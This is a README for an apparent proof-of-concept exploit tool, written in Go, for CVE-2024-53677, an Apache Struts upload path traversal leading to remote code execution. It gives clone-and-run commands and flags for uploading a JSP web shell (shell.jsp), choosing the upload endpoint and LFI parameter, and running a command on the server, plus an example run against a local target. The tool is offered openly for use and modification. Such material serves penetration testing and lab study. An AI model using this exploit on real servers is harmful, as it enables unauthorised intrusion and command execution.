
a proof of concept of CVE-2024-53677
A kind old vulnerability that effect Apache Struts leading to LFI, and remote exection.
Apache Struts path traversal → RCE (CVE-2024-53677)
I have send much time make this as custamizable as possiable because when i first encounter this CVE did not find a good source that implement it correctly. Most of the flags have a default values so do not be discourage with all of these flags.
git clone https://github.com/Cythonic1/CVE-2024-53677-POC
cd CVE-2024-53677-POC
go run . -h
-command string
command to execute on the server default: whoami
-end-point string
post endpoint default to: upload.action
-file-location string
where to save the file into the server default: what test function return
-lfi-param string
Parameter name for LFI testing default: top.UploadFileName
-payload-file string
Path to the payload file default: ./shell.jsp
-payload-file-name string
name of the payload it self default: shell.jsp
-payload-param string
Parameter name for payload injection default: Upload
-test-file-name string
name of the testfile it self default: testfile.txt
-testing-file string
File used for testing default: ./testfile.txt
-url string
Target base URL (format http://strutted.htb/) do not forgot the [/] at the end
All of these commands has defaults values. I also implement a testing function to check where the file should be put and it also a user configurable options.
go run . -url http://127.0.0.1:8080/ -end-point upload.action
Few things to note.
Feel free to modifie or add on the exploit ♥️.